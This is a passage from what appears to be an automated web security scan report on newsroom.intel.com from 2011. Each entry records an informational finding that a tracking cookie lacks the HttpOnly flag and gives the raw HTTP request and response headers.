Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.140. http://newsroom.intel.com/docs/DOC-1405  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1405

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c323037373b332c323137373b332c333031313b332c323137393b3130322c313430353b3130322c313430363b3130322c313830313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:16 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1405 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:14 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323037373b332c323137373b332c333031313b332c323137393b3130322c313430353b3130322c313430363b3130322c313830313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:16 GMT; Path=/
X-JAL: 137
Content-Language: en-US
CacheHit: D=145435 t=1296947714874736
X-JSL: D=145441 t=1296947714874736
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.141. http://newsroom.intel.com/docs/DOC-1406  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1406

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c323137373b332c323137393b332c323037373b332c333031313b3130322c313430363b3130322c313830313b3130322c313430353b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:17 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1406 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:16 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c323137373b332c323137393b332c323037373b332c333031313b3130322c313430363b3130322c313830313b3130322c313430353b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:17 GMT; Path=/
X-JAL: 132
Content-Language: en-US
CacheHit: D=230475 t=1296947716041062
X-JSL: D=230480 t=1296947716041062
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.142. http://newsroom.intel.com/docs/DOC-1502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1502

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137373b332c323037373b332c323137393b3130322c313530323b3130322c313430353b3130322c313830313b3130322c313430363b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:26 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1502 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:24 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137373b332c323037373b332c323137393b3130322c313530323b3130322c313430353b3130322c313830313b3130322c313430363b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:26 GMT; Path=/
X-JAL: 88
Content-Language: en-US
CacheHit: D=105071 t=1296947724957894
X-JSL: D=105076 t=1296947724957894
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.143. http://newsroom.intel.com/docs/DOC-1512  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1512

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b332c323037373b3130322c313531323b3130322c313530323b3130322c313634313b3130322c313430363b3130322c313430353b3130322c313830313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:35 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1512 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:33 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b332c323037373b3130322c313531323b3130322c313530323b3130322c313634313b3130322c313430363b3130322c313430353b3130322c313830313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:35 GMT; Path=/
X-JAL: 291
Content-Language: en-US
CacheHit: D=300088 t=1296947733483012
X-JSL: D=300094 t=1296947733483012
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.144. http://newsroom.intel.com/docs/DOC-1641  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1641

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137373b332c323137393b332c323037373b3130322c313634313b3130322c313830313b3130322c313430363b3130322c313530323b3130322c313430353b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:27 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1641 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:25 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137373b332c323137393b332c323037373b3130322c313634313b3130322c313830313b3130322c313430363b3130322c313530323b3130322c313430353b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:27 GMT; Path=/
X-JAL: 86
Content-Language: en-US
CacheHit: D=94366 t=1296947725779156
X-JSL: D=94371 t=1296947725779156
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.145. http://newsroom.intel.com/docs/DOC-1801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /docs/DOC-1801

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137373b332c323137393b332c323037373b3130322c313830313b3130322c313430353b3130322c313430363b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:17 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1801 HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:15 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137373b332c323137393b332c323037373b3130322c313830313b3130322c313430353b3130322c313430363b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323031303b31342c323030363b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:17 GMT; Path=/
X-JAL: 123
Content-Language: en-US
CacheHit: D=166884 t=1296947715224417
X-JSL: D=166890 t=1296947715224417
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.146. http://newsroom.intel.com/people/KrystalTemple  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/KrystalTemple

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323037373b332c323137393b332c323137373b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323031363b31342c323031303b31342c323032373b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:13 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/KrystalTemple HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:11 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323037373b332c323137393b332c323137373b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323031363b31342c323031303b31342c323032373b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:13 GMT; Path=/
X-JAL: 76
Content-Language: en-US
CacheHit: D=89700 t=1296947711726745
X-JSL: D=89705 t=1296947711726745
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.147. http://newsroom.intel.com/people/cldotts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /people/cldotts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c323137373b332c323037373b332c323137393b332c333031313b33382c313931393b33382c313936303b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031363b31342c323032373b31342c323030363b31342c323031303b31342c323030373b31342c323031313b31342c323030343b31342c323030353b31342c323032353b; Expires=Mon, 07-Mar-2011 23:15:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/cldotts HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
